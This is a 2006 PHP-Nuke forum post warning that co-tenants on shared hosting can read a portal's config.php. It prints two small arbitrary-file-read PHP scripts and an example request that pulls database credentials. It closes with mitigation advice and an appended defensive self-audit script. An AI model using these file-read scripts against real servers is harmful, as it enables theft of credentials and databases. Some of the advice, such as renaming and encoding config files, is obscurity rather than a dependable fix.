Nuke Cops :: View topic - Security in shared web servers! be careful: everybody can ha [ ]
sanbad
Nuke Cadet
Joined: May 08, 2006
Posts: 2
Location: Iran

Posted: Sun Jul 16, 2006 4:21 am

Security in shared web servers! be careful: everybody can hack your portal and db.

Hi

If your PHP portal is installed on a shared server, you must be careful.
Another user who resides on your server (he has a hosting account on your server) can hack your portal!

How can he hack your portal?

By this script (script 1):

Code:
<?php
if (isset($a) )
{
echo implode("", file("$a"));
}
?>

And by another one (script 2):

Code:
<?php

    header('Content-Type: text/plain');
    readfile($_GET['a']);

?>


With these scripts, a user who resides on your server can get your files or your code; for example, he can get your config.php and see your database user, password and name, and download your data!!!

1- The hacker must know your ID on your hosting, so he calls one of the PHP files that belong to your portal in his browser,
for example:
Code:
http://www.yourwebsite.com/forum/includes/functions.php?anyfunctionIntegerArgument=text

After this request, he sees an error report like this:
Code:
/home/yourID/public_html/forum/includes/functions.php  error 607 in line 563
Now he has found your ID.

2- Now he uses one of these scripts, for example script 1, as in this case:
Code:
http://www.hackerWebsite.com/script1.php?a=/home/yourID/public_html/forum/config.php

Then he views the page source and reads your db config information!

3- By using a simple script he can download your db or he can write to your db and …
He can install the same portal and edit and change some code, then he can use your encrypted admin password and log in some times and…

How can we solve this problem?

1- We must add this code to the prologue of all PHP files:
Code:
ini_set('display_errors', 'Off');
ini_set('log_errors', 'On');

So the hacker cannot find your ID. And you can see the error log in the cPanel of your Linux hosting.

2- You must rename your config.php file and edit all PHP files which include or require the config.php file. Then you must encrypt these files using zend-phpencoder or any other encoder program.
So if a hacker finds your ID, he will not find your db config file.

3- Or use a dedicated server only for yourself.


In PHP-Nuke, if Nuke Sentinel is used and the IP tracker is on, then all users' usernames and passwords (even admin) are inserted in
Code:
nuke_nsnst_tracked_ips
!!!

So the nuke owner or a hacker can see users' passwords.

If you want to register on portals you must use different passwords.
If your password is the same as another important one, for example your email password, domain panel password or your bank account, a hacker or the nuke website owner can access that!

In other portals, the owner can change the script code and find your password.

_________________
www.sanbad.com
Alireza SSE
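
A self-check for the settings discussed in the post above, as an added example that is not part of the original post or of PHP-Nuke. It reports whether `display_errors` and `log_errors` match the post's recommendation, and additionally (an assumption beyond the post) checks `open_basedir` and lists PHP files whose permission bits allow reading by "other"; the function names are hypothetical.

```php
<?php
// Added example, not from the original post. Upload it to the portal root,
// request it once in a browser so it sees the web server's PHP settings,
// then delete it. Paths are printed relative to the root on purpose.

/** ini flags come back as strings such as "1", "On", "0", "Off" or "". */
function ini_flag_on(string $name): bool
{
    $v = strtolower(trim((string) ini_get($name)));
    return !in_array($v, ['', '0', 'off', 'false', 'no', 'none'], true);
}

/** The two settings from the post, plus open_basedir (an added check). */
function audit_settings(): array
{
    $out = [];
    if (ini_flag_on('display_errors')) {
        $out[] = 'display_errors is on: error output can reveal the full script path';
    }
    if (!ini_flag_on('log_errors')) {
        $out[] = 'log_errors is off: errors are not being recorded';
    }
    if (trim((string) ini_get('open_basedir')) === '') {
        $out[] = 'open_basedir is empty: PHP file functions are not confined to one tree';
    }
    return $out;
}

/** PHP files under $root whose mode has the "other" read bit set. */
function audit_world_readable(string $root): array
{
    $out = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $f) {
        $mode = $f->getPerms() & 0777;
        if ($f->isFile() && strtolower($f->getExtension()) === 'php' && ($mode & 0004)) {
            $rel = ltrim(substr($f->getPathname(), strlen($root)), '/');
            $out[] = sprintf('%s is mode %04o: the "other" read bit is set', $rel, $mode);
        }
    }
    return $out;
}

header('Content-Type: text/plain');
$findings = array_merge(audit_settings(), audit_world_readable(__DIR__));
echo $findings ? implode("\n", $findings) . "\n" : "No findings\n";
```

Whether the "other" read bit can be dropped depends on how the host runs PHP; if scripts execute under a shared web server user, that user still needs read access to your files.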